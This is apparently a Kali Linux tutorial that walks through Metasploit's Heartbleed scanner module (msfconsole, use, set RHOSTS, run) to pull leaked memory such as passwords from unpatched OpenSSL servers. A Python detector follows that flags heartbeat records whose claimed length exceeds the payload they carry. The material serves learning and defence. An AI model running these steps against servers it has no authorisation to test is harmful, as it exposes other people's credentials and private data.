Metasploit -- The Bleeding Heart

Heartbleed is a vulnerability in the OpenSSL cryptography library, which was introduced in 2012 and publicly disclosed in 2014. Heartbleed can be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS (Transport Layer Security) server or client.



In this tutorial we will learn how to use the Heartbleed auxiliary module in Metasploit in a Kali Linux environment.

We open a terminal window and start Metasploit with the msfconsole command:

msfconsole


Then we search for the Heartbleed auxiliary module using the search command:

search heartbleed


Then we select the auxiliary module with the following command:

use auxiliary/scanner/ssl/openssl_heartbleed



Now we list the module's options with the following command:

show options


Now we need to set RHOSTS to our target IP using the following command:

set RHOSTS x.x.xx


One more thing to do: we set verbose to true using the following command:

set verbose true
Now we are all set; we just type the run command to see the data.

run
This data even contains security info, like passwords, e-mail IDs, and many more.

This vulnerability is fixed, but there are many web server owners who still have not updated their OpenSSL. We can check whether our server is affected by the Heartbleed vulnerability on this site: https://filippo.io/Heartbleed/
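On the defending side, a Heartbleed probe is recognisable on the wire as a heartbeat message whose length field claims more payload than the TLS record actually carries. The following is an added example (not from the original post or from Metasploit) that flags such records in a captured TLS byte stream. It assumes the heartbeat is sent in plaintext before encryption starts, and all function names and sample bytes are constructed for illustration.

```python
import struct

HEARTBEAT = 24                 # TLS record content type for heartbeat (RFC 6520)
HB_TYPES = {1: "request", 2: "response"}
MIN_PADDING = 16               # RFC 6520: at least 16 bytes of padding

def tls_records(stream):
    """Yield (content_type, fragment) for each complete TLS record in stream."""
    pos = 0
    while pos + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from("!BHH", stream, pos)
        fragment = stream[pos + 5:pos + 5 + length]
        if len(fragment) < length:
            break              # truncated capture: stop instead of guessing
        yield ctype, fragment
        pos += 5 + length

def check_heartbeat(fragment):
    """Return a finding for a heartbeat whose claimed length exceeds its record."""
    if len(fragment) < 3:
        return "heartbeat record shorter than its 3-byte header"
    hb_type, claimed = struct.unpack_from("!BH", fragment, 0)
    if hb_type not in HB_TYPES:
        return None            # not a plaintext heartbeat (e.g. encrypted record)
    carried = len(fragment) - 3
    if claimed + MIN_PADDING > carried:
        return (f"heartbeat {HB_TYPES[hb_type]} claims {claimed} payload bytes, "
                f"record carries {carried}")
    return None

def scan(stream):
    """Return findings for every heartbeat record in a captured byte stream."""
    findings = []
    for ctype, fragment in tls_records(stream):
        if ctype == HEARTBEAT:
            finding = check_heartbeat(fragment)
            if finding:
                findings.append(finding)
    return findings

def record(ctype, fragment):   # helper to build the constructed sample below
    return struct.pack("!BHH", ctype, 0x0302, len(fragment)) + fragment

# Constructed sample capture: one handshake record, one well-formed heartbeat,
# and one heartbeat whose length field exceeds what the record carries.
GOOD = b"\x01" + struct.pack("!H", 4) + b"ping" + bytes(MIN_PADDING)
BAD = b"\x01" + struct.pack("!H", 0x4000)
SAMPLE = record(22, bytes(4)) + record(HEARTBEAT, GOOD) + record(HEARTBEAT, BAD)

if __name__ == "__main__":
    for line in scan(SAMPLE):
        print(line)
```

Heartbeats sent after encryption is enabled cannot be parsed this way; for those, only the record's content type and size are visible.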
Reviewed by Kali Linux on February 25, 2019
